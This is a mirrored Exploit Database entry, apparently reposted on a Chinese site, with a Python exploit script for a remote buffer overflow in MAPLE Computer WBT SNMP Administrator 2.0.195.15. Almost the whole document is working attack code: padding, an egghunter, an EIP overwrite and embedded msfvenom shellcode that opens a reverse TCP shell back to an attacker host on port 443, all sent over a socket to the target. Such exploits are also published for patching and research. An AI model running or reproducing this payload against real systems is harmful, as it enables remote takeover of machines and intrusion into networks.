MAPLE Computer WBT SNMP Administrator 2.0.195.15 – Remote Buffer Overflow (EggHunter)

Exploit Database
113 阅读

作者： sasaga92

日期： 2019-07-19
类别：
- remote
平台：
- windows_x86
来源：https://www.exploit-db.com/exploits/47137/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)

# Author: sasaga92

# Discovery Date: 2019-07-18

# Vendor Homepage: www.computerlab.com

# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager

# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE

# Tested on OS: Windows XP SP2 x86

# CVE: N/A

# [+] Credits: John Page (aka hyp3rlinx)

#!/usr/bin/python

import sys

import socket

import random

import string

import struct

def pattern_create(_type,_length):

_type = _type.split(" ")

if _type[0] == "trash":

return _type[1] * _length

elif _type[0] == "random":

return ''.join(random.choice(string.lowercase) for i in range(_length))

elif _type[0] == "pattern":

_pattern = ''

_parts = ['A', 'a', '0']

while len(_pattern) != _length:

_pattern += _parts[len(_pattern) % 3]

if len(_pattern) % 3 == 0:

_parts[2] = chr(ord(_parts[2]) + 1)

if _parts[2] > '9':

_parts[2] = '0'

_parts[1] = chr(ord(_parts[1]) + 1)

if _parts[1] > 'z':

_parts[1] = 'a'

_parts[0] = chr(ord(_parts[0]) + 1)

if _parts[0] > 'Z':

_parts[0] = 'A'

return _pattern

else:

return "Not Found"

def pwned(_host, _port, _payload):

print "[*] Conectandose a {0}:{1}...".format(_host, _port)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((_host, _port))

print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))

_payload = "{0}\r\n\r\n".format(_payload)

s.send(_payload)

_data = s.recv(1024)

s.shutdown

s.close

print 'Recibido:', repr(_data)

print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))

def main():

_host = "192.168.0.12"

_port = 987

_offset_eip = 642200

_padding = 642144

_eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3

_tag = "w00tw00t"

#msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c

_shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"

"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"

"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"

"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"

"\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"

"\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"

"\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"

"\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"

"\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"

"\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"

"\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"

"\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"

"\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"

"\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"

"\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"

"\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"

"\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"

"\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"

"\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"

"\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"

"\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"

"\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"

"\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"

"\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"

"\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"

"\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"

"\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"

"\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"

"\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"

"\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"

"\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"

"\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"

"\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"

"\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"

"\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"

"\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"

"\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"

"\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"

"\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"

"\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"

"\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"

"\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"

"\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"

"\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"

"\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"

"\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"

"\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"

"\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"

"\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"

"\x70\x73\x63\x69\x6f\x59\x45\x41\x41")

_egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

_inject =pattern_create("trash A", _padding-len(_tag)-len(_shellcode))

_inject += _tag

_inject += _shellcode

_inject += _egghunter

_inject +=pattern_create("trash B", _offset_eip-len(_inject))

_inject += _eip

print(_inject)

pwned(_host,_port,_inject)

if __name__ == "__main__":

main()